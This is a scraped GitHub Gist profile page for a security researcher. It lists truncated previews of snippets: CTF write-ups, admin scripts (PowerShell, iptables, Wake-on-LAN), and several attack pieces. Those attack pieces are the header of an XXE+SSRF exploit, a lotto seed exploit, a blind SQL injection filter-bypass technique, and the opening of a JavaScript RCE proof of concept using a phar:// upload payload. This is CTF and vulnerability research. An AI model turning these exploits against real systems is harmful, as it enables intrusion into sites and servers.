Skip to content

Instantly share code, notes, and snippets.

View stypr's full-sized avatar
🆎**********************************
Be Lazy~

Harold Kim stypr

🆎**********************************
Be Lazy~
541 followers · 122 following
View GitHub Profile
@stypr
stypr / README.md
Last active June 22, 2019 15:47
ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/

Description

@stypr
stypr / rdp.ps1
Last active August 17, 2019 19:58
How to convert HTTPS Certificates for RDP auth (using Caddy)
# derived from http://stackoverflow.com/questions/40046916/how-to-grant-permission-to-user-on-certificate-private-key-using-powershell
param (
[string]$certThumbprint = "NothingToDoHere"
)
$serviceAccount = 'NETWORK SERVICE'
$permissionType = 'Read'
try
{
Write-Host "Thumbprint: $certThumbprint"
#Clear Existing Variables
@stypr
stypr / patch.py
Last active August 3, 2019 16:59
Migrating old php files to newer versions
#!/usr/bin/python -u
#-*-coding: utf-8-*-
def list_directory(expression):
try:
_c = __import__("glob").glob(expression + "/*")
for i in xrange(len(_c)):
if "uploads" not in _c[i] and "userimage" not in _c[i] and "files" not in _c[i]:
_c.extend(list_directory(_c[i]))
return _c
except:
@stypr
stypr / README.md
Last active January 26, 2020 20:37
SecuInside 2017: Mathboy7 (415pt)

Mathboy7 (415pt)

ENCRYPT() 함수를 통해 Random String을 만들 수 있음

encryption-functions from mysql.com

  1. ENCRYPT(x) 시 확률상 문제를 풀 수 없지만, salt 값을 설정하면 첫번째 몇 글자 정도는 같게 되므로 확률이 굉장히 줄어듬.

  2. ENCRYPT(x,y) 출력시 나오는 값은 A-Za-z0-9./ 로 이루어져있어서 확률상 어렵지만, 문제에서 strtolower($var) 로 인해 확률이 2차적으로 줄어들음.

@stypr
stypr / iptables-irccloud.sh
Created October 29, 2017 14:42
iptables configuration for connections between irssiproxy and irccloud
iptables -N irccloud
iptables -A irccloud --src 192.184.9.108 -j ACCEPT
iptables -A irccloud --src 192.184.9.110 -j ACCEPT
iptables -A irccloud --src 192.184.9.112 -j ACCEPT
iptables -A irccloud --src 192.184.10.118 -j ACCEPT
iptables -A irccloud --src 192.184.10.9 -j ACCEPT
iptables -A irccloud --src 170.178.187.131 -j ACCEPT
iptables -A irccloud --src 192.184.8.73 -j ACCEPT
iptables -A irccloud --src 192.184.8.103 -j ACCEPT
iptables -A irccloud -j DROP
@stypr
stypr / exploit.py
Created November 3, 2017 09:58
familiar (485pt) XXE + SSRF
#!/usr/bin/python -u
#-*- encoding: utf-8 -*-
import os
import sys
import requests
import json
from base64 import *
HOST = "core.eagle-jump.org"
@stypr
stypr / 9en3rat0r.php
Last active August 3, 2019 16:54
Lotto Exploit
<?php
function generator()
{
$PATH = "./s3cre7_fi1e";
$init_seed = 0;
if(!file_exists(realpath($PATH)))
{
$init_seed = $seed = intval(uniqid(),10);
$f = fopen($PATH,"w");
fwrite($f,$init_seed);
@stypr
stypr / README.md
Last active August 25, 2020 15:06
Blind SQLi 2018: Utilizing SQL standard to create payloads

There are several ways to bypass blind SQLi filters, and today I will introduce MySQL blind sqli payload using an insert() function.

Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.

This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ... ) are blocked by the script.

TL;DR

@stypr
stypr / iptime_wol.py
Created February 13, 2018 07:12
iptime WOL in python
#!/usr/bin/python -u
#-*- coding: utf-8 -*-
# Developer: Harold Kim(root@stypr.com)
import os
import sys
import re
import requests
class iptime:
@stypr
stypr / attack_script.js
Last active August 3, 2019 16:47
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
// 업로드한 파일의 페이로드.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// 먼저 공격에 앞서, 해당 기능을 지원하는 관리자인지 확인한다.
$.get(`../qa_config.php`, function(d){
// 수정할 곳은 ”파일 경로“ 가 들어간 곳이므로, 이 부분만 우선 확인한다.
if(d.indexOf(`상단 파일 경로`) !== false){